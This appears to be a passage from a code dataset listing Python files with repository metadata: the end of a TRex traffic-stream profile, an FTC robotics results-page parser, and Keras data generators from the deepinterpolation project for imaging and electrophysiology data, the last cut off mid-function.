                                          max_value="18.0.0.254",
                                          size=4, op="random"),
                           STLVmFlowVar(name="src_port",
                                          min_value=1025,
                                          max_value=65000,
                                          size=2, op="random"),
                           STLVmWrFlowVar(fv_name="ip_src", pkt_offset= "IP.src" ),
                           STLVmFixIpv4(offset = "IP"), # fix checksum
                           STLVmWrFlowVar(fv_name="src_port",
                                                pkt_offset= "TCP.sport") # fix udp len
                          ]
                       )
        pkt = STLPktBuilder(pkt = base_pkt,
                            vm = vm)
        return STLStream(packet = pkt,
                         random_seed = 0x1234,# can be remove. will give the same random value any run
                         mode = STLTXCont())
def register():
    """Module-level factory: return a fresh Prof profile instance."""
    return Prof()
| 1,423 | -8 | 73 |
39c95dbf7cfd4d5c5459f3becb477b2b40029973 | 5,465 | py | Python | helpers/results_page_helper.py | guineawheek/ftcdata | f6515da93c7a788b00b3e88d4c507c2140d7e385 | [
"MIT"
] | 1 | 2019-05-21T08:10:41.000Z | 2019-05-21T08:10:41.000Z | helpers/results_page_helper.py | guineawheek/ftcdata | f6515da93c7a788b00b3e88d4c507c2140d7e385 | [
"MIT"
] | null | null | null | helpers/results_page_helper.py | guineawheek/ftcdata | f6515da93c7a788b00b3e88d4c507c2140d7e385 | [
"MIT"
] | null | null | null | import logging
from models import Event, Ranking, Award, Match, MatchScore
from bs4 import BeautifulSoup
from db.orm import orm
class ResultsPageHelper:
"""Helper methods to parse the output from FTC Live Scoring Software pages"""
res_map = {"R": "red", "B": "blue", "T": "tie"}
@classmethod
@classmethod
@classmethod
@classmethod
@classmethod
def load_rankings(cls, table, matches, has_hs=True):
"""has_hs=False is necessary for rly old data"""
try:
event_key = matches[0][0].event_key
except IndexError:
logging.warning("can't load rankings on zero length match table!")
return
high_scores, wlt = cls.highscores_wlt(matches)
ret = []
#first = True
for tr in table.find_all("tr"):
td_tags = list(tr.find_all("td"))
if not td_tags:
continue
td = [td.get_text() for td in td_tags]
tkey = "ftc" + td[1]
twlt = wlt[tkey]
if not has_hs:
r = Ranking(event_key=event_key, team_key=tkey, rank=int(td[0]), qp_rp=int(td[3]), rp_tbp=int(td[4]),
high_score=high_scores.get(tkey, 0),
wins=twlt[0], losses=twlt[1], ties=twlt[2], dqed=0, played=int(td[5]))
else:
r = Ranking(event_key=event_key, team_key=tkey, rank=int(td[0]), qp_rp=int(td[3]), rp_tbp=int(td[4]),
high_score=int(td[5]),
wins=twlt[0], losses=twlt[1], ties=twlt[2], dqed=0, played=int(td[6]))
ret.append(r)
return ret
@classmethod
| 41.401515 | 188 | 0.543458 | import logging
from models import Event, Ranking, Award, Match, MatchScore
from bs4 import BeautifulSoup
from db.orm import orm
class ResultsPageHelper:
"""Helper methods to parse the output from FTC Live Scoring Software pages"""
res_map = {"R": "red", "B": "blue", "T": "tie"}
@classmethod
def parse_match_code(cls, mname):
match_code = mname.split('-')
comp_level = match_code[0].lower()
mnum = int(match_code[-1])
set_number = int(match_code[1]) if len(match_code) == 3 else None
return comp_level, mnum, set_number
@classmethod
def _mk_match(cls, event_key, mname, result, red_a, blue_a):
comp_level, mnum, set_number = cls.parse_match_code(mname)
match = Match(event_key=event_key, comp_level=comp_level, match_number=mnum, set_number=set_number)
scores, winner = result.split()
red_score, blue_score = scores.split('-')
match.winner = cls.res_map[winner]
match.gen_keys()
red = MatchScore(key=match.red_key, alliance_color="red", event_key=event_key, match_key=match.key, dqed=[], total=int(red_score), teams=[f'ftc{s.strip("*")}' for s in red_a])
red.surrogates = [f'ftc{s.strip("*")}' for s in red_a if s.endswith('*')]
blue = MatchScore(key=match.blue_key, alliance_color="blue", event_key=event_key, match_key=match.key, dqed=[], total=int(blue_score), teams=[f'ftc{s.strip("*")}' for s in blue_a])
blue.surrogates = [f'ftc{s.strip("*")}' for s in blue_a if s.endswith('*')]
return (match, red, blue)
@classmethod
def load_matches(cls, table, event_key):
red_a, blue_a = None, None
mname, result = "", ""
matches = []
for tr in table.find_all("tr"):
td = [td.get_text() for td in tr.find_all("td")]
if len(td) == 4:
if red_a:
matches.append(cls._mk_match(event_key, mname, result, red_a, blue_a))
mname = td[0]
result = td[1]
red_a, blue_a = [td[2]], [td[3]]
elif len(td) == 2:
red_a.append(td[0])
blue_a.append(td[1])
matches.append(cls._mk_match(event_key, mname, result, red_a, blue_a))
return matches
@classmethod
def load_match_details(cls, table, event_key):
matches = []
for tr in table.find_all("tr"):
td = [td.get_text() for td in tr.find_all("td")]
if len(td) < 16:
continue
match, red, blue = cls._mk_match(event_key, td[0], td[1], td[2].split(), td[3].split())
red.total, blue.total = int(td[4]), int(td[10])
red.auto, blue.auto = int(td[5]), int(td[11])
red.auto_bonus, blue.auto_bonus = int(td[6]), int(td[12])
red.teleop, blue.teleop = int(td[7]), int(td[13])
red.endgame, blue.endgame = int(td[8]), int(td[14])
red.penalty, blue.penalty = int(td[9]), int(td[15])
matches.append((match, red, blue))
return matches
@classmethod
def load_rankings(cls, table, matches, has_hs=True):
    """Parse a rankings <table> into Ranking objects.

    has_hs=False is necessary for rly old data whose tables have no
    high-score column; the high score is then computed from the matches.
    Returns None when the match list is empty.
    """
    try:
        event_key = matches[0][0].event_key
    except IndexError:
        logging.warning("can't load rankings on zero length match table!")
        return
    # W/L/T records (and, for old tables, high scores) are derived from the
    # match list rather than read off the page.
    high_scores, wlt = cls.highscores_wlt(matches)
    ret = []
    for tr in table.find_all("tr"):
        td_tags = list(tr.find_all("td"))
        if not td_tags:
            # Rows without <td> cells (e.g. header rows) carry no ranking data.
            continue
        td = [td.get_text() for td in td_tags]
        tkey = "ftc" + td[1]  # column 1 holds the team number
        twlt = wlt[tkey]
        if not has_hs:
            # No high-score column: use the computed one; played is column 5.
            r = Ranking(event_key=event_key, team_key=tkey, rank=int(td[0]), qp_rp=int(td[3]), rp_tbp=int(td[4]),
                        high_score=high_scores.get(tkey, 0),
                        wins=twlt[0], losses=twlt[1], ties=twlt[2], dqed=0, played=int(td[5]))
        else:
            # Table carries its own high-score column (5); played is column 6.
            r = Ranking(event_key=event_key, team_key=tkey, rank=int(td[0]), qp_rp=int(td[3]), rp_tbp=int(td[4]),
                        high_score=int(td[5]),
                        wins=twlt[0], losses=twlt[1], ties=twlt[2], dqed=0, played=int(td[6]))
        ret.append(r)
    return ret
@classmethod
def highscores_wlt(cls, matches):
    """Compute per-team qualification high scores and win/loss/tie records.

    Returns (high_scores, wlt): dicts keyed by team key; wlt values are
    [wins, losses, ties] lists. Only 'q' (qualification) matches count.
    """
    all_teams = set()
    for _, red_score, blue_score in matches:
        all_teams.update(red_score.teams)
        all_teams.update(blue_score.teams)

    high_scores = dict.fromkeys(all_teams, 0)
    wlt = {team: [0, 0, 0] for team in all_teams}

    for match, red_score, blue_score in matches:
        if match.comp_level != 'q':
            continue
        for alliance in (red_score, blue_score):
            for team in alliance.teams:
                high_scores[team] = max(high_scores[team], alliance.total)
        # NOTE(review): non-red/blue results land in the loss column for both
        # alliances (index 1, not the tie slot 2) -- preserved as-is; confirm
        # against cls.res_map whether ties should increment index 2 instead.
        if match.winner == 'red':
            red_idx, blue_idx = 0, 1
        elif match.winner == 'blue':
            red_idx, blue_idx = 1, 0
        else:
            red_idx, blue_idx = 1, 1
        for team in red_score.teams:
            wlt[team][red_idx] += 1
        for team in blue_score.teams:
            wlt[team][blue_idx] += 1

    return high_scores, wlt
| 3,654 | 0 | 130 |
6a73b83c877297fb609627c070518c8f93ebfd7a | 38,276 | py | Python | deepinterpolation/generator_collection.py | sakuroki/deepinterpolation | 0b08cfbbdb02eec6d2bc2badfd007070fc020bc7 | [
"Unlicense"
] | null | null | null | deepinterpolation/generator_collection.py | sakuroki/deepinterpolation | 0b08cfbbdb02eec6d2bc2badfd007070fc020bc7 | [
"Unlicense"
] | null | null | null | deepinterpolation/generator_collection.py | sakuroki/deepinterpolation | 0b08cfbbdb02eec6d2bc2badfd007070fc020bc7 | [
"Unlicense"
] | null | null | null | # Class to generate data for training
import numpy as np
import json
import h5py
import os
import tensorflow.keras as keras
from deepinterpolation.generic import JsonLoader
import tifffile
import nibabel as nib
from scipy.io import wavfile
import s3fs
class DeepGenerator(keras.utils.Sequence):
    """
    This class instantiates the basic Generator Sequence object from which all Deep Interpolation generators should be generated.

    Parameters:
    json_path: a path to the json file used to parametrize the generator

    Returns:
    None
    """

    def get_input_size(self):
        """
        This function returns the input size of the generator, excluding the batching dimension

        Parameters:
        None

        Returns:
        tuple: list of integer size of input array, excluding the batching dimension
        """
        # First element of a batch is the network input; drop the batch axis.
        local_obj = self.__getitem__(0)[0]
        return local_obj.shape[1:]

    def get_output_size(self):
        """
        This function returns the output size of the generator, excluding the batching dimension

        Parameters:
        None

        Returns:
        tuple: list of integer size of output array, excluding the batching dimension
        """
        # Second element of a batch is the expected network output.
        local_obj = self.__getitem__(0)[1]
        return local_obj.shape[1:]

    def __get_norm_parameters__(self, idx):
        """
        This function returns the normalization parameters of the generator. This can potentially be different for each data sample

        Parameters:
        idx index of the sample

        Returns:
        local_mean
        local_std
        """
        # NOTE(review): idx is unused here -- all samples share one set of
        # statistics; local_mean/local_std are expected to be set by an
        # __init__ not shown in this excerpt or by the subclass.
        local_mean = self.local_mean
        local_std = self.local_std
        return local_mean, local_std
class OnePGenerator(DeepGenerator):
    """
    This generator delivers data provided from an hdf5 file made
    from one photon miniscope data.

    Parameters:
    str: json_path: path to the json parameter file

    Returns:
    None
    """

    # NOTE(review): this excerpt shows no __init__; attributes such as
    # list_samples, batch_size, movie_size, pre_post_frame, local_raw_data,
    # local_mean and local_std must be set elsewhere.

    def __len__(self):
        "Denotes the total number of batches"
        return int(np.floor(float(len(self.list_samples)) / self.batch_size))

    def __data_generation__(self, index_frame):
        "Generates data containing batch_size samples"
        # local_raw_data = h5py.File(self.raw_data_file, 'r')['1']

        # Input: pre_post_frame frames on each side of index_frame;
        # output: the center frame itself (the one to be interpolated).
        input_full = np.zeros(
            [1, self.movie_size[1], self.movie_size[2], self.pre_post_frame * 2]
        )
        output_full = np.zeros([1, self.movie_size[1], self.movie_size[2], 1])

        input_index = np.arange(
            index_frame - self.pre_post_frame, index_frame + self.pre_post_frame + 1
        )
        # Exclude the center frame so the network never sees its own target.
        input_index = input_index[input_index != index_frame]

        data_img_input = self.local_raw_data[input_index, :, :]
        data_img_output = self.local_raw_data[index_frame, :, :]

        # Move the frame axis last: (frames, d1, d2) -> (d1, d2, frames).
        data_img_input = np.swapaxes(data_img_input, 1, 2)
        data_img_input = np.swapaxes(data_img_input, 0, 2)

        img_in_shape = data_img_input.shape
        img_out_shape = data_img_output.shape

        # Normalize with the movie-wide statistics.
        data_img_input = (
            data_img_input.astype("float") - self.local_mean
        ) / self.local_std
        data_img_output = (
            data_img_output.astype("float") - self.local_mean
        ) / self.local_std

        input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
        output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output

        return input_full, output_full
class CollectorGenerator(DeepGenerator):
    "This class allows to create a generator of generators for the purpose of training across multiple files"
    "All generators must have idendical batch size and input, output size but can be different length"

    def __len__(self):
        "Denotes the total number of batches"
        # Total batch count is the sum over all wrapped generators.
        total_len = 0
        for local_generator in self.generator_list:
            total_len = total_len + local_generator.__len__()
        return total_len
class EphysGenerator(DeepGenerator):
    "Generates data for Keras"

    def __init__(self, json_path):
        "Initialization"
        super().__init__(json_path)

        self.raw_data_file = self.json_data["train_path"]
        self.batch_size = self.json_data["batch_size"]
        self.pre_post_frame = self.json_data["pre_post_frame"]
        self.pre_post_omission = self.json_data["pre_post_omission"]
        self.start_frame = self.json_data["start_frame"]
        self.steps_per_epoch = self.json_data["steps_per_epoch"]

        # This is compatible with negative frames
        self.end_frame = self.json_data["end_frame"]

        #self.nb_probes = 384
        self.nb_probes = self.json_data["nb_probes"] # modified by sk 2020/11/20

        # First map the flat int16 file to measure its total length.
        self.raw_data = np.memmap(self.raw_data_file, dtype="int16")

        if self.end_frame < 0:
            # Negative end_frame counts back from the end of the recording.
            self.img_per_movie = (
                int(self.raw_data.size / self.nb_probes)
                + 1
                + self.end_frame
                - self.start_frame
                - self.pre_post_frame
                - self.pre_post_omission
            )
        elif int(self.raw_data.size / self.nb_probes) < self.end_frame:
            # Requested end is beyond the recording: clamp to what exists.
            self.img_per_movie = (
                int(self.raw_data.size / self.nb_probes)
                - self.start_frame
                - self.pre_post_frame
                - self.pre_post_omission
            )
        else:
            self.img_per_movie = self.end_frame + 1 - self.start_frame

        self.total_frame_per_movie = int(self.raw_data.size / self.nb_probes)

        average_nb_samples = 200000

        # Probes are arranged as two staggered columns along the shank.
        shape = (self.total_frame_per_movie, int(self.nb_probes / 2), 2)

        # load it with the correct shape
        self.raw_data = np.memmap(self.raw_data_file, dtype="int16", shape=shape)

        # Older reshape code, to remove when stable
        # Reshape in number of traces
        # self.raw_data = np.reshape(self.raw_data, (self.total_frame_per_movie,
        # self.nb_probes))
        # Reshape following probes location
        # self.raw_data = np.reshape(self.raw_data, (self.total_frame_per_movie
        # int(self.nb_probes/2), 2)

        # Normalization statistics from the first chunk of the recording.
        local_data = self.raw_data[0:average_nb_samples, :, :].flatten()
        local_data = local_data.astype("float32")

        self.local_mean = np.mean(local_data)
        self.local_std = np.std(local_data)

        self.epoch_index = 0

        self.list_samples = np.arange(
            self.start_frame, self.start_frame + self.img_per_movie
        )
        if "randomize" in self.json_data.keys():
            if self.json_data["randomize"] == 1:
                np.random.shuffle(self.list_samples)

    def __len__(self):
        "Denotes the total number of batches"
        return int(np.floor(float(len(self.list_samples)) / self.batch_size))

    def __data_generation__(self, index_frame):
        "Generates data containing batch_size samples"

        # We reorganize to follow true geometry of probe for convolution
        input_full = np.zeros(
            [1, self.nb_probes, 2, self.pre_post_frame * 2], dtype="float32"
        )
        output_full = np.zeros([1, self.nb_probes, 2, 1], dtype="float32")

        input_index = np.arange(
            index_frame - self.pre_post_frame - self.pre_post_omission,
            index_frame + self.pre_post_frame + self.pre_post_omission + 1,
        )
        # Drop the center frame, then the omitted frames on both sides, so
        # the network cannot copy temporally adjacent samples.
        input_index = input_index[input_index != index_frame]

        for index_padding in np.arange(self.pre_post_omission + 1):
            input_index = input_index[input_index != index_frame - index_padding]
            input_index = input_index[input_index != index_frame + index_padding]

        data_img_input = self.raw_data[input_index, :, :]
        data_img_output = self.raw_data[index_frame, :, :]

        # Move the frame axis last: (frames, d1, d2) -> (d1, d2, frames).
        data_img_input = np.swapaxes(data_img_input, 1, 2)
        data_img_input = np.swapaxes(data_img_input, 0, 2)

        img_in_shape = data_img_input.shape

        data_img_input = (
            data_img_input.astype("float32") - self.local_mean
        ) / self.local_std
        data_img_output = (
            data_img_output.astype("float32") - self.local_mean
        ) / self.local_std

        # alternating filling with zeros padding
        even = np.arange(0, self.nb_probes, 2)
        odd = even + 1

        input_full[0, even, 0, :] = data_img_input[:, 0, :]
        input_full[0, odd, 1, :] = data_img_input[:, 1, :]
        output_full[0, even, 0, 0] = data_img_output[:, 0]
        output_full[0, odd, 1, 0] = data_img_output[:, 1]

        return input_full, output_full
class SingleTifGenerator(DeepGenerator):
    "Generates data for Keras"

    def __init__(self, json_path):
        "Initialization"
        super().__init__(json_path)

        self.raw_data_file = self.json_data["train_path"]
        self.batch_size = self.json_data["batch_size"]
        self.pre_post_frame = self.json_data["pre_post_frame"]
        self.pre_post_omission = self.json_data["pre_post_omission"]
        self.start_frame = self.json_data["start_frame"]

        if "randomize" in self.json_data.keys():
            self.randomize = self.json_data["randomize"]
        else:
            self.randomize = 1

        # This is compatible with negative frames
        self.end_frame = self.json_data["end_frame"]

        # The whole movie is loaded into memory.
        with tifffile.TiffFile(self.raw_data_file) as tif:
            self.raw_data = tif.asarray()

        self.total_frame_per_movie = self.raw_data.shape[0]

        if self.end_frame < 0:
            # Negative end_frame counts back from the end of the movie.
            self.img_per_movie = (
                self.total_frame_per_movie + 1 + self.end_frame - self.start_frame
            )
        elif self.total_frame_per_movie < self.end_frame:
            self.img_per_movie = self.total_frame_per_movie + 1 - self.start_frame
        else:
            self.img_per_movie = self.end_frame + 1 - self.start_frame

        average_nb_samples = 1000

        # Normalization statistics from the first frames of the movie.
        local_data = self.raw_data[0:average_nb_samples, :, :].flatten()
        local_data = local_data.astype("float32")

        self.local_mean = np.mean(local_data)
        self.local_std = np.std(local_data)

        # Keep a margin on both sides so every sample has a full context window.
        self.list_samples = np.arange(
            self.pre_post_frame + self.pre_post_omission + self.start_frame,
            self.start_frame
            + self.img_per_movie
            - self.pre_post_frame
            - self.pre_post_omission,
        )

        if self.randomize:
            np.random.shuffle(self.list_samples)

    def __len__(self):
        "Denotes the total number of batches"
        return int(np.floor(float(len(self.list_samples)) / self.batch_size))

    def __data_generation__(self, index_frame):
        # X : (n_samples, *dim, n_channels)
        "Generates data containing batch_size samples"

        input_full = np.zeros(
            [
                1,
                self.raw_data.shape[1],
                self.raw_data.shape[2],
                self.pre_post_frame * 2,
            ],
            dtype="float32",
        )
        output_full = np.zeros(
            [1, self.raw_data.shape[1], self.raw_data.shape[2], 1], dtype="float32"
        )

        input_index = np.arange(
            index_frame - self.pre_post_frame - self.pre_post_omission,
            index_frame + self.pre_post_frame + self.pre_post_omission + 1,
        )
        # Drop the center frame and the omitted frames on both sides.
        input_index = input_index[input_index != index_frame]

        for index_padding in np.arange(self.pre_post_omission + 1):
            input_index = input_index[input_index != index_frame - index_padding]
            input_index = input_index[input_index != index_frame + index_padding]

        data_img_input = self.raw_data[input_index, :, :]
        data_img_output = self.raw_data[index_frame, :, :]

        # Move the frame axis last: (frames, d1, d2) -> (d1, d2, frames).
        data_img_input = np.swapaxes(data_img_input, 1, 2)
        data_img_input = np.swapaxes(data_img_input, 0, 2)

        img_in_shape = data_img_input.shape
        img_out_shape = data_img_output.shape

        data_img_input = (
            data_img_input.astype("float32") - self.local_mean
        ) / self.local_std
        data_img_output = (
            data_img_output.astype("float32") - self.local_mean
        ) / self.local_std

        input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
        output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output

        return input_full, output_full
class OphysGenerator(DeepGenerator):
    "Generates data for Keras"

    def __init__(self, json_path):
        "Initialization"
        super().__init__(json_path)

        # Movies can be read either from a local hdf5 file or from S3.
        if "from_s3" in self.json_data.keys():
            self.from_s3 = self.json_data["from_s3"]
        else:
            self.from_s3 = False

        self.raw_data_file = self.json_data["movie_path"]
        self.batch_size = self.json_data["batch_size"]
        self.pre_frame = self.json_data["pre_frame"]
        self.post_frame = self.json_data["post_frame"]
        self.start_frame = self.json_data["start_frame"]

        # This is compatible with negative frames
        self.end_frame = self.json_data["end_frame"]

        # This is used to limit the total number of samples
        # -1 means to take all and is the default fall back
        if "total_samples" in self.json_data.keys():
            self.total_samples = self.json_data["total_samples"]
        else:
            self.total_samples = -1

        if self.from_s3:
            s3_filesystem = s3fs.S3FileSystem()
            raw_data = h5py.File(s3_filesystem.open(self.raw_data_file,'rb'),'r')['data']
        else:
            raw_data = h5py.File(self.raw_data_file, "r")["data"]

        self.total_frame_per_movie = int(raw_data.shape[0])

        if self.end_frame < 0:
            # Negative end_frame counts back from the end of the movie.
            self.img_per_movie = (
                self.total_frame_per_movie
                + 1
                + self.end_frame
                - self.start_frame
                - self.post_frame
            )
        elif self.total_frame_per_movie < self.end_frame:
            self.img_per_movie = (
                self.total_frame_per_movie - self.start_frame - self.post_frame
            )
        else:
            self.img_per_movie = self.end_frame + 1 - self.start_frame

        average_nb_samples = 1000

        # Normalization statistics from the first frames of the movie.
        local_data = raw_data[0:average_nb_samples, :, :].flatten()
        local_data = local_data.astype("float32")
        self.local_mean = np.mean(local_data)
        self.local_std = np.std(local_data)

        self.list_samples = np.arange(
            self.start_frame, self.start_frame + self.img_per_movie
        )

        if "randomize" in self.json_data.keys():
            self.randomize = self.json_data["randomize"]
        else:
            self.randomize = 1

        if self.randomize:
            np.random.shuffle(self.list_samples)

        # We cut the number of samples if asked to
        if self.total_samples>0 and self.total_samples<len(self.list_samples):
            self.list_samples = self.list_samples[0:self.total_samples]

    def __len__(self):
        "Denotes the total number of batches"
        return int(np.floor(float(len(self.list_samples)) / self.batch_size))

    def __data_generation__(self, index_frame):
        "Generates data containing batch_size samples"

        # NOTE(review): the file handle is reopened for every sample --
        # presumably for multi-worker safety; confirm before changing.
        if self.from_s3:
            s3_filesystem = s3fs.S3FileSystem()
            movie_obj = h5py.File(s3_filesystem.open(self.raw_data_file,'rb'),'r')
        else:
            movie_obj = h5py.File(self.raw_data_file, "r")

        # NOTE(review): frame size is hard-coded to 512x512 here.
        input_full = np.zeros([1, 512, 512, self.pre_frame + self.post_frame])
        output_full = np.zeros([1, 512, 512, 1])

        input_index = np.arange(
            index_frame - self.pre_frame, index_frame + self.post_frame + 1,
        )
        # Exclude the center frame (the prediction target) from the input.
        input_index = input_index[input_index != index_frame]

        data_img_input = movie_obj["data"][input_index, :, :]
        data_img_output = movie_obj["data"][index_frame, :, :]

        # Move the frame axis last: (frames, d1, d2) -> (d1, d2, frames).
        data_img_input = np.swapaxes(data_img_input, 1, 2)
        data_img_input = np.swapaxes(data_img_input, 0, 2)

        img_in_shape = data_img_input.shape
        img_out_shape = data_img_output.shape

        data_img_input = (
            data_img_input.astype("float") - self.local_mean
        ) / self.local_std
        data_img_output = (
            data_img_output.astype("float") - self.local_mean
        ) / self.local_std

        input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
        output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output

        movie_obj.close()

        return input_full, output_full
class MovieJSONGenerator(DeepGenerator):
    """Generator driven by a json index of {lims_id: {path, frames, mean, std}}.

    Each sample interpolates one listed frame of one movie, normalized with
    the per-movie mean/std stored in the index file.
    """

    def __init__(self, json_path):
        "Initialization"
        super().__init__(json_path)

        self.sample_data_path_json = self.json_data["train_path"]
        self.batch_size = self.json_data["batch_size"]
        self.steps_per_epoch = self.json_data["steps_per_epoch"]
        self.epoch_index = 0

        # The following is to be backward compatible
        if "pre_frame" in self.json_data.keys():
            self.pre_frame = self.json_data["pre_frame"]
        else:
            self.pre_frame = self.json_data["pre_post_frame"]

        if "post_frame" in self.json_data.keys():
            self.post_frame = self.json_data["post_frame"]
        else:
            self.post_frame = self.json_data["pre_post_frame"]

        with open(self.sample_data_path_json, "r") as json_handle:
            self.frame_data_location = json.load(json_handle)

        self.lims_id = list(self.frame_data_location.keys())
        self.nb_lims = len(self.lims_id)
        # NOTE(review): assumes every movie lists the same number of frames
        # as the first one -- confirm against the index files in use.
        self.img_per_movie = len(self.frame_data_location[self.lims_id[0]]["frames"])

    def __len__(self):
        "Denotes the total number of batches"
        return int(np.ceil(float(self.nb_lims * self.img_per_movie) / self.batch_size))

    def __data_generation__(self, index_frame):
        # X : (n_samples, *dim, n_channels)
        "Generates data containing batch_size samples"
        try:
            # Maps a flat sample index to (movie id, frame slot); defined on
            # the class elsewhere in this file.
            local_lims, local_img = self.get_lims_id_sample_from_index(index_frame)

            # Initialization
            local_path = self.frame_data_location[local_lims]["path"]

            # Pick the first processed movie file that exists and is a real
            # file (symlinks are rejected).
            _filenames = ["motion_corrected_video.h5", "concat_31Hz_0.h5"]
            motion_path = []
            for _filename in _filenames:
                _filepath = os.path.join(local_path, "processed", _filename)
                if os.path.exists(_filepath) and not os.path.islink(
                    _filepath
                ):  # Path exists and is not symbolic
                    motion_path = _filepath
                    break

            movie_obj = h5py.File(motion_path, "r")

            output_frame = self.frame_data_location[local_lims]["frames"][local_img]
            local_mean = self.frame_data_location[local_lims]["mean"]
            local_std = self.frame_data_location[local_lims]["std"]

            # NOTE(review): frame size is hard-coded to 512x512 here.
            input_full = np.zeros([1, 512, 512, self.pre_frame + self.post_frame])
            output_full = np.zeros([1, 512, 512, 1])

            input_index = np.arange(
                output_frame - self.pre_frame, output_frame + self.post_frame + 1,
            )
            # Exclude the target frame from the network input.
            input_index = input_index[input_index != output_frame]

            data_img_input = movie_obj["data"][input_index, :, :]
            data_img_output = movie_obj["data"][output_frame, :, :]

            # Move the frame axis last: (frames, d1, d2) -> (d1, d2, frames).
            data_img_input = np.swapaxes(data_img_input, 1, 2)
            data_img_input = np.swapaxes(data_img_input, 0, 2)

            img_in_shape = data_img_input.shape
            img_out_shape = data_img_output.shape

            # Normalize with the per-movie statistics from the index file.
            data_img_input = (data_img_input.astype("float") - local_mean) / local_std
            data_img_output = (data_img_output.astype("float") - local_mean) / local_std

            input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
            output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output
            movie_obj.close()

            return input_full, output_full
        except Exception:
            # Bug fix: this handler was a bare `except:` that printed the
            # undefined name `output_frame_index`, so every failure was masked
            # by a NameError. Report the failing sample index, then re-raise
            # the original error instead of silently returning None.
            print("Issues with " + str(self.lims_id) + " at " + str(index_frame))
            raise
| 36.143532 | 131 | 0.604844 | # Class to generate data for training
import numpy as np
import json
import h5py
import os
import tensorflow.keras as keras
from deepinterpolation.generic import JsonLoader
import tifffile
import nibabel as nib
from scipy.io import wavfile
import s3fs
class MaxRetryException(Exception):
    """Helper exception for EmGenerator."""
class DeepGenerator(keras.utils.Sequence):
    """
    This class instantiates the basic Generator Sequence object from which all Deep Interpolation generators should be generated.

    Parameters:
    json_path: a path to the json file used to parametrize the generator

    Returns:
    None
    """

    def __init__(self, json_path):
        # Parse the parameter file once; subclasses read self.json_data.
        local_json_loader = JsonLoader(json_path)
        local_json_loader.load_json()
        self.json_data = local_json_loader.json_data
        # Identity normalization by default; subclasses overwrite these with
        # statistics computed from their data.
        self.local_mean = 1
        self.local_std = 1

    def get_input_size(self):
        """
        This function returns the input size of the generator, excluding the batching dimension

        Parameters:
        None

        Returns:
        tuple: list of integer size of input array, excluding the batching dimension
        """
        # First element of a batch is the network input; drop the batch axis.
        local_obj = self.__getitem__(0)[0]
        return local_obj.shape[1:]

    def get_output_size(self):
        """
        This function returns the output size of the generator, excluding the batching dimension

        Parameters:
        None

        Returns:
        tuple: list of integer size of output array, excluding the batching dimension
        """
        # Second element of a batch is the expected network output.
        local_obj = self.__getitem__(0)[1]
        return local_obj.shape[1:]

    def __len__(self):
        # Base class yields no batches; subclasses override.
        return 0

    def __getitem__(self, idx):
        # Base class returns an empty input/output pair; subclasses override.
        return [np.array([]), np.array([])]

    def __get_norm_parameters__(self, idx):
        """
        This function returns the normalization parameters of the generator. This can potentially be different for each data sample

        Parameters:
        idx index of the sample

        Returns:
        local_mean
        local_std
        """
        # NOTE(review): idx is unused here -- all samples share one set of
        # statistics; subclasses may override for per-sample values.
        local_mean = self.local_mean
        local_std = self.local_std
        return local_mean, local_std
class OnePGenerator(DeepGenerator):
    """
    This generator delivers data provided from an hdf5 file made
    from one photon miniscope data.

    Parameters:
    str: json_path: path to the json parameter file

    Returns:
    None
    """

    def __init__(self, json_path):
        super().__init__(json_path)

        self.raw_data_file = self.json_data["train_path"]
        self.pre_post_frame = self.json_data["pre_post_frame"]
        self.start_frame = self.json_data["start_frame"]

        # This is compatible with negative frames
        self.end_frame = self.json_data["end_frame"]

        # The movie lives in dataset '1' of the hdf5 file.
        self.raw_data = h5py.File(self.raw_data_file, "r")["1"]
        self.movie_size = self.raw_data.shape

        if self.end_frame < 0:
            # Negative end_frame counts back from the end of the movie.
            self.img_per_movie = (
                int(self.raw_data.shape[0]) + 1 + self.end_frame - self.start_frame
            )
        else:
            self.img_per_movie = self.end_frame + 1 - self.start_frame

        # Pull the whole movie into memory and zero out non-finite values.
        self.local_raw_data = self.raw_data[:, :, :]
        list_nan = ~(np.isfinite(self.local_raw_data))
        self.local_raw_data[list_nan] = 0

        average_nb_samples = 50

        # Only indices with a full pre/post context window are eligible.
        self.list_samples = np.arange(
            self.pre_post_frame + self.start_frame,
            self.start_frame + self.img_per_movie - self.pre_post_frame,
        )
        np.random.shuffle(self.list_samples)

        # Normalization statistics from the first frames of the movie.
        local_data = self.local_raw_data[0:average_nb_samples, :, :].flatten()

        self.local_mean = np.mean(local_data)
        self.local_std = np.std(local_data)
        self.batch_size = self.json_data["batch_size"]

    def __len__(self):
        "Denotes the total number of batches"
        return int(np.floor(float(len(self.list_samples)) / self.batch_size))

    def __getitem__(self, index):
        # Generate indexes of the batch
        # The final batch may be truncated when the movie does not divide evenly.
        if (index + 1) * self.batch_size > self.img_per_movie:
            indexes = np.arange(index * self.batch_size, self.img_per_movie)
        else:
            indexes = np.arange(index * self.batch_size, (index + 1) * self.batch_size)

        shuffle_indexes = self.list_samples[indexes]

        input_full = np.zeros(
            [
                self.batch_size,
                self.movie_size[1],
                self.movie_size[2],
                self.pre_post_frame * 2,
            ]
        )
        output_full = np.zeros(
            [self.batch_size, self.movie_size[1], self.movie_size[2], 1]
        )

        for batch_index, frame_index in enumerate(shuffle_indexes):
            X, Y = self.__data_generation__(frame_index)
            input_full[batch_index, :, :, :] = X
            output_full[batch_index, :, :, :] = Y

        return input_full, output_full

    def __data_generation__(self, index_frame):
        "Generates data containing batch_size samples"
        # local_raw_data = h5py.File(self.raw_data_file, 'r')['1']

        # Input: pre_post_frame frames on each side of index_frame;
        # output: the center frame itself (the one to be interpolated).
        input_full = np.zeros(
            [1, self.movie_size[1], self.movie_size[2], self.pre_post_frame * 2]
        )
        output_full = np.zeros([1, self.movie_size[1], self.movie_size[2], 1])

        input_index = np.arange(
            index_frame - self.pre_post_frame, index_frame + self.pre_post_frame + 1
        )
        # Exclude the center frame so the network never sees its own target.
        input_index = input_index[input_index != index_frame]

        data_img_input = self.local_raw_data[input_index, :, :]
        data_img_output = self.local_raw_data[index_frame, :, :]

        # Move the frame axis last: (frames, d1, d2) -> (d1, d2, frames).
        data_img_input = np.swapaxes(data_img_input, 1, 2)
